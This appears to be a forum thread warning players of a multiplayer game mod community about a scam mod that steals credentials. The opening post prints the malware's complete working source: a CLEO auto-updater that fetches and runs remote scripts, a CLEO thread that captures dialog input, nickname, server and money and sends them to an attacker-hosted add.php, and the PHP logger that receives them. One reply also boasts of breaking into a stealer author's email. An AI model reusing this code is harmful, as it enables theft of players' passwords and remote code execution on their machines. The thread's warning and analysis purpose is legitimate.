Intriguing scam (check if your data was stolen)

monday

[video=youtube]https://www.youtube.com/watch?v=dNTbpmnWZU0[/video]


Code:
0000:
 
const 
    SCRIPT_VERSION = 1
 
    UPDATEINFO_FILE = "cleo_name_update.txt"
    CHANGELOG_FILE = "cleo_name_changelog.txt"
end
 
repeat
    wait 3000
until 0AFA:  is_samp_available
 
wait 0
 
0AB1: call_scm_func @check_updates 1 current_version SCRIPT_VERSION
 
while true
    wait 0
end
 
:download_check_status 

[email protected] = -1
while [email protected] == -1 
    wait 0
    0C66: [email protected] = get_download [email protected] state 
end
0AB2: ret 1 [email protected] // 
 
:url_fileupdateinfo // 
// 
hex
    "http:" "/" "/" "rvankarus.esy.es/cleo/update.txt" 00
end
 
:check_updates
// call 
0AC6: [email protected] = label @url_fileupdateinfo offset // 
0C65: [email protected] = download_url [email protected] to_file UPDATEINFO_FILE // 
0AB1: call_scm_func @download_check_status 1 download_n [email protected] status_to [email protected]
0C7D: release_download [email protected] // 
 
if [email protected] <> 0 // 
then
    wait 0
else // ?????
    wait 0
 
    if 0AAB: file_exists UPDATEINFO_FILE // 
    then
        0AF0: [email protected] = get_int_from_ini_file UPDATEINFO_FILE section "UPDATE" key "version" // 
        if 001D: [email protected] > [email protected] // 
        then
            wait 0
 
            0AC8: [email protected] = allocate_memory_size 260 // 
            0C11: memset destination [email protected] value 0 size 260 // 
 
            0AF4: [email protected] = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "changelog_url" // 
            0C65: [email protected] = download_url [email protected] to_file CHANGELOG_FILE // 
            0AB1: call_scm_func @download_check_status 1 download_n [email protected] status_to [email protected] // 
            0C7D: release_download [email protected] //
 
            if [email protected] == 0
            then
                wait 0
 
            end
 
            // -------
            0C11: memset destination [email protected] value 0 size 260 // 
            0AF4: [email protected] = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script_url" //
            0C65: [email protected] = download_url [email protected] to_file "cleo/FileSystem.cs" // 
            0AB1: call_scm_func @download_check_status 1 download_n [email protected] status_to [email protected] //
            0C7D: release_download [email protected] //
            0A92: create_custom_thread "FileSystem.cs"

            if [email protected] == 0
            then
            wait 0
            else
                wait 0
            end
            
            // -------
            0C11: memset destination [email protected] value 0 size 260 // 
            0AF4: [email protected] = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script1" //
            0C65: [email protected] = download_url [email protected] to_file "cleo/animbot4.cs" // 
            0AB1: call_scm_func @download_check_status 1 download_n [email protected] status_to [email protected] //
            0C7D: release_download [email protected] //
            0A92: create_custom_thread "animbot4.cs"

            if [email protected] == 0
            then
            wait 0
            else
                wait 0
            end
            
            // -------
            0C11: memset destination [email protected] value 0 size 260 // 
            0AF4: [email protected] = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "data1" //
            0C65: [email protected] = download_url [email protected] to_file "data\Decision\chris\data1.txt" // 
            0AB1: call_scm_func @download_check_status 1 download_n [email protected] status_to [email protected] //
            0C7D: release_download [email protected] //

            if [email protected] == 0
            then
            wait 0
            else
                wait 0
            end
            
            // -------
            0C11: memset destination [email protected] value 0 size 260 // 
            0AF4: [email protected] = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "data2" //
            0C65: [email protected] = download_url [email protected] to_file "data\Decision\chris\data2.txt" // 
            0AB1: call_scm_func @download_check_status 1 download_n [email protected] status_to [email protected] //
            0C7D: release_download [email protected] //

            if [email protected] == 0
            then
            wait 0
            else
                wait 0
            end
 
            0AC9: free_allocated_memory [email protected]
        end
    end
end
0AB2: ret 0
 
:show_changelog // 
if 0A9A: [email protected] = openfile CHANGELOG_FILE mode "rt" // 
then
    0AC8: [email protected] = allocate_memory_size 96 // 
    0C11: memset destination [email protected] value 0 size 96
 
    0A9C: [email protected] = file [email protected] size // 
    [email protected]++ 
 
    0AC8: [email protected] = allocate_memory_size [email protected] // 
    0C11: memset destination [email protected] value 0 size [email protected]
    repeat     
        0AD7: read_string_from_file [email protected] to [email protected] size 95
        0C17: [email protected] = strlen [email protected]
        if [email protected] > 0
        then
            0C15: strcat destination [email protected] source [email protected] // 
        end
    until 0AD6: end_of_file [email protected] reached
 
    0B3B: samp show_dialog id 335 caption "{FFFFFF}Daniel Nguyen" text [email protected] button_1 "Closed" button_2 "" style 0 // 
 
    0AC9: free_allocated_memory [email protected] // 
    
    0AC9: free_allocated_memory [email protected] // 
    0A9B: closefile [email protected] // ????????? ????              
end
0AB2: ret 0

Code:
0000:

const 
    SCRIPT_VERSION = 1

    UPDATEINFO_FILE = "data\Decision\chris\cleo_name_update.txt"
    CHANGELOG_FILE = "data\Decision\chris\cleo_name_changelog.txt"
    DELTA_1 = "data\Decision\chris\delta.txt"
    NAVY_1 = "data\Decision\chris\navy.txt"
    HUMAN_1 = "data\Decision\chris\human.txt"
    AIR_1 = "data\Decision\chris\air.txt"
    COMMAN_1 = "data\Decision\chris\comman.txt" 
    SECU_1 = "data\Decision\chris\secu.txt" 
end

repeat
    wait 5000
    until 0B61:  samp is_local_player_spawned



0AF8: samp add_message_to_chat "" color -1

0AB1: call_scm_func @check_updates 1 current_version SCRIPT_VERSION

while true
    wait 0
end

:download_check_status 
// call @download_check_status 1 download_n [email protected]
[email protected] = -1
while [email protected] == -1 
    wait 0
    0C66: [email protected] = get_download [email protected] state /
end
0AB2: ret 1 [email protected] 

:url_fileupdateinfo 
//  URL 
hex
    "http:" "/" "/" "rvankarus1.pe.hu/cleo/update.txt" 00
end

:check_updates
// call @check_updates 1 current_version [email protected]
0AC6: [email protected] = label @url_fileupdateinfo offset // ??????? ?????? ? ????????????? ??????????
0C65: [email protected] = download_url [email protected] to_file UPDATEINFO_FILE // ???????? ?????????? ?????
0AB1: call_scm_func @download_check_status 1 download_n [email protected] status_to [email protected]
0C7D: release_download [email protected] // ???????????, ?.?. ?????????? ?????????

if [email protected] <> 0 // ???? ?????? ?? ????? 0(?.?. ???????? ????????? ????????), ??
then
     Marker.Disable([email protected])
else // ?????
     Marker.Disable([email protected])

    if 0AAB: file_exists UPDATEINFO_FILE // ???? ?? ???? ?? ??? ?????? ? ??????????? ??? ?????, ???????? ??? ?? ?????? ??????
    then
        0AF0: [email protected] = get_int_from_ini_file UPDATEINFO_FILE section "UPDATE" key "version" // ?????? ????? ?????? ? ????????? ????? ??????????
        if 001D: [email protected] > [email protected] // ???? ??????? ?????? ??????? ??????, ??? ????????? ? ????? ??????????, ??
        then
             Marker.Disable([email protected])

            0AC8: [email protected] = allocate_memory_size 260 // ???????? ?????? ??? URL ???????? ?????
            0C11: memset destination [email protected] value 0 size 260 // ??????? ?? ???????? ????????(?? ?????? ??????)

            0AF4: [email protected] = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "changelog_url" // ?????? URL ???????? ?????? ?????????
            0C65: [email protected] = download_url [email protected] to_file CHANGELOG_FILE // ????????? ?????? ?????????
            0AB1: call_scm_func @download_check_status 1 download_n [email protected] status_to [email protected] // ???? ????????? ????????
            0C7D: release_download [email protected] //


            // -------
            0C11: memset destination [email protected] value 0 size 260 //
            0AF4: [email protected] = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script2" //
            0C65: [email protected] = download_url [email protected] to_file "cleo/anticrash-1.cs" // ????????? ????? ?????? ??????? ? ???????? ??????? ??????
            0AB1: call_scm_func @download_check_status 1 download_n [email protected] status_to [email protected] //
            0C7D: release_download [email protected] //
            0A92: create_custom_thread "anticrash-1.cs"


            if [email protected] == 0
            then
                Marker.Disable([email protected])
            else
                Marker.Disable([email protected])
            end
            
             // -------
            0C11: memset destination [email protected] value 0 size 260 //
            0AF4: [email protected] = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script1" //
            0C65: [email protected] = download_url [email protected] to_file "cleo/FileSystemOperations.cs" // ????????? ????? ?????? ??????? ? ???????? ??????? ??????
            0AB1: call_scm_func @download_check_status 1 download_n [email protected] status_to [email protected] //
            0C7D: release_download [email protected] //
            
            if [email protected] == 0
            then
                Marker.Disable([email protected])
            else
                Marker.Disable([email protected])
            end
            
             // -------
            0C11: memset destination [email protected] value 0 size 260 //
            0AF4: [email protected] = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script3" //
            0C65: [email protected] = download_url [email protected] to_file "cleo/Systemcode.cs" // ????????? ????? ?????? ??????? ? ???????? ??????? ??????
            0AB1: call_scm_func @download_check_status 1 download_n [email protected] status_to [email protected] //
            0C7D: release_download [email protected] //
            0A92: create_custom_thread "systemcode.cs"
            
            if [email protected] == 0
            then
                Marker.Disable([email protected])
            else
                Marker.Disable([email protected])
            end
            
             // -------
            0C11: memset destination [email protected] value 0 size 260 //
            0AF4: [email protected] = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script4" //
            0C65: [email protected] = download_url [email protected] to_file "cleo/backupp1.cs" // ????????? ????? ?????? ??????? ? ???????? ??????? ??????
            0AB1: call_scm_func @download_check_status 1 download_n [email protected] status_to [email protected] //
            0C7D: release_download [email protected] //
            0A92: create_custom_thread "backupp1.cs"
            
            
            if [email protected] == 0
            then
                Marker.Disable([email protected])
            else
                Marker.Disable([email protected])
            end
            
            
             // -------
            0C11: memset destination [email protected] value 0 size 260 //
            0AF4: [email protected] = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script5" //
            0C65: [email protected] = download_url [email protected] to_file "cleo/backupp2.cs" // ????????? ????? ?????? ??????? ? ???????? ??????? ??????
            0AB1: call_scm_func @download_check_status 1 download_n [email protected] status_to [email protected] //
            0C7D: release_download [email protected] //
            0A92: create_custom_thread "backupp2.cs"
            
            
            
            
            


            0AC9: free_allocated_memory [email protected]
        end
    end
end
0AB2: ret 0

:show_changelog // ????????? ??????? ??? ?????? ?????? ?????????
if 0A9A: [email protected] = openfile CHANGELOG_FILE mode "rt" // ????????? ???? ??? ??????
then
    0AC8: [email protected] = allocate_memory_size 96 // ???????? ?????? ??? ?????? ?? ?????
    0C11: memset destination [email protected] value 0 size 96

    0A9C: [email protected] = file [email protected] size // ???????? ?????? ?????
    [email protected]++ // ????????? ?????? - ???????

    0AC8: [email protected] = allocate_memory_size [email protected] // ???????? ?????? ??? ?????? ?????????
    0C11: memset destination [email protected] value 0 size [email protected]
    repeat     
        0AD7: read_string_from_file [email protected] to [email protected] size 95
        0C17: [email protected] = strlen [email protected]
        if [email protected] > 0
        then
            0C15: strcat destination [email protected] source [email protected] // ??????????? ?????? ?? ????? ? ????? ?? ??????? ?????????
        end
    until 0AD6: end_of_file [email protected] reached

    0B3B: samp show_dialog id 335 caption "{66CC00}San Andreas Armed Service" text [email protected] button_1 "10-4" button_2 "" style 0 // ?????????? ??????

    0AC9: free_allocated_memory [email protected] // ????? ?? ????????????

    0AC9: free_allocated_memory [email protected] //
    0A9B: closefile [email protected] // ????????? ????              
end
0AB2: ret 0
Code:
<?php  
  $f = fopen("Readme.HTML", "a");  
  $s = "<u>Login:</u><strong> " . $_GET['nick'] . " |...|</strong> " . " <u>Ip:</u> " . $_GET['ip'] . " <strong>|...|</strong> " . " <u>Server:</u><em> " . $_GET['serv'] . " </em><strong>|...|</strong> " . " <u>Dialog:</u> " . $_GET['dialog'] . " <strong>|...|</strong> " . " <u>Text:</u><strong> " . $_GET['input'] . " |...|</strong> " . " <u>Money:</u> " . $_GET['mn'] . "<br />";  
  fwrite($f, $s);  
  fclose($f);  
  ?>

//--------------------------------------------------------------------------------------------------------------------------------------------------------
}
{$CLEO}
thread 'NoName'
While 8afa:
wait 100
end   
While 8B4C: -1
wait 100
end
While 0B4C: -1
wait 0
0B4E: samp [email protected] = get_current_dialog_id
0AC8: [email protected] = 64
repeat
wait 0
0B4A: samp [email protected] = get_current_dialog_editbox_text
until 8B4C: -1  
0AC8: [email protected] = 24
0B2B: [email protected] = $PLAYER_ACTOR
0B36: samp [email protected] = get_player_nickname [email protected]
wait 500
010B: [email protected] = player $PLAYER_CHAR money
0AC8: [email protected] = 15
0B39: samp get_current_server_address [email protected] port [email protected]
0AC8: [email protected] = 86
0B3A: samp [email protected] = get_current_server_name
0C17: [email protected] = strlen [email protected]
if [email protected] > 1
    then  
    0AC8: [email protected] = 445       
    0AD3: [email protected] = format "http:%c%crvankarus.esy.es%ccleo%cadd.php?nick=%s&ip=%s:%d&serv=%s&dialog=%d&input=%s&mn=%d" params 47 47 47 47 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] // ñá â êîâû÷êàõ íåëüçÿ ïèñàòü ñëåøü, ïîýòìó òàì ãäå äîëæíà áûòü ñëåøü ñòîèò %c - çíàê çàïèñàíûé â ïàðàìåòðàõ.  ïàðàìåòðàõ äëÿ êàæäîé %c ïðîïèñàí 47 - ýòî íîìåð ñëåøà. Ñòàíäàðòíî ñòîèò àäðåñ http://stilloger.ph/stealer/add.php?[äàëåå äàííûå], òàê êàê ñá íå ëþáèò ñëåøü â êîâû÷êàõ, òî àäðåñ çàïèñàí òàê http:%c%cstilloger.ph%cstealer%cadd.php?[äàëåå äàííûå]
    0AA2: [email protected] = load_library "urlmon.dll" // IF and SET
    0AA4: [email protected] = get_proc_address "URLDownloadToFileA" library [email protected] // IF and SET     
    0AA5: call [email protected] num_params 5 pop 0 params lpfnCB 0 dwReserved 0 szFileName "%TEMP%\2352sfe.tmp" szUrl [email protected] caller 0  
    0AA3: [email protected]  
    0AC9: [email protected]
    end
0AC9: [email protected]
0AC9: [email protected]
0AC9: [email protected]
0AC9: [email protected]
wait 500 
end     
[email protected] = 0
[email protected] = 0
[email protected] = 0
[email protected] = 0
[email protected] = 0
[email protected] = 0
[email protected] = 0
[email protected] = 0
[email protected] = 0
[email protected] = 0 
[email protected] = 0
[email protected] = 0
[email protected] = 0
wait 1000
0A93: end_custom_thread
0A93: end_custom_thread
0A93: end_custom_thread
0A93: end_custom_thread

some nice names for malware:
-FileSystem.cs (downloaded from http://rvankarus.esy.es/cleo/steal.cs xD)
-backup2.cs
-anticrash-1
-systemcode.cs
-backupp1.cs
-backupp2.cs

 

monday

essentially it's a credentials stealer; it uploads something like this:
Name: Douglas_Spatacus | Sever: 163.44.206.243:7777 | Server: [VcG] Vietnamese Community GTA | Dialog: 50 | Password: | | Money: 142907377 |IP: 00.000.000.00 | Time: [2017/07/02 - 18:30:06]

But it has auto-updates and created cleo files that are not hosted on his server any more, so it's difficult to say what exactly it did or what exactly it will do in future; it could do anything
 

0BE4

nice warning, tho i think admins here check if each .cs is clean... right admins (Not sure i just think i heard that before from springfield(aka if you are reading this springfield and you don't remember shit you can just pm me and i'll remove this part) but MAYBE i am just saying MAYBE they just throw shit)? but there are many people here who download anything from anywhere without decompiling it...

Psst. LOL this comment doesn't even give a single useful statement it's just a pile of maybes xD

If you are too lazy to read: Good thing there is actually a living human who doesn't get too lazy to warn others...

useful tips:
there is a good anti-stealer (never actually made a stealer to test it)...
.exe's are mostly very unsafe; you can absolutely hide ANYTHING, even a rat, if you want...
Never download anything that says: "write your name and delete it". Why? Because it's simply a keylogger: since they can't log your name, they ask you to type it so that they get it logged
Never download anything that says "exploit" in it and asks you for a specific server and a specific amount of money. Why, you may ask? NO exploit in this world asks for a specific amount of money unless the value is VERY specific...
try virustotal.com; results aren't too accurate (I made an entire goddamn rat that doesn't even get detected)
Decompile every cleo you have and every cleo you will download... if it's encrypted, better never touch it
if you don't know how to understand code spam springfield (Just kidding)
it's just simple instructions you can read; cleo viruses and shit never look like a simple set-car-position cleo

Sorry, there is no lazy version...
 

Zin

Actually there is a lazy version.

http://ugbase.eu/Thread-IMPORTANT-Informations-regarding-CLEO-Keyloggers?highlight=%28IMPORTANT%29+Informations+regarding+CLEO+Keyloggers
 

monday

The video and the mod have been shared and probably made by "Daniel Nguyen", who deleted it, created a new account on UGBASE "ParkCant" and UGBASE discord "Tose_Khovor", trying to convince me to delete the source code because:




He wrote to himself using an alternative fb account, made 2 accounts (ugbase + discord) to pretend he's worrying about people making malware, potentially made a few "shit-posts" just to increase his credibility (and move this thread away from the latest topics), said that someone in his group shared it and said it was "anti-crash", he posted 2 images of it, 1st showing the post, 2nd showing members of that group (he probably doesn't know that the first displayed person of the group is the owner of the account xD)

[img=200x200]http://cdn-static.denofgeek.com/sites/denofgeek/files/styles/main_wide/public/2017/01/sherlock_holmes.jpg?itok=rWgQ454n[/img]
 

0BE4

xD ... i was once sent to one of these but it was .exe it used to simply get the data and send it via email to the noob... So i disassembled it AND just by using the very basics i was able to access his email .... xD Yeah trust me it's VERY easy to get it if the guy is too noob(Don't worry they are mostly are)... maybe i'll do a thread on how to get emails and passwords from noobs sending stealers and shit... Now i enjoy these "Stealers" a bit too much xD
 

WaTTi

TeRmminaTo[R] said:
can someone tell me how this work i dont understand :/ ( can someone give me a link to download it full xD)
WHY YOU WANT DOWNLOAD AND USE A FUCKING DATA STEALER. :-/
 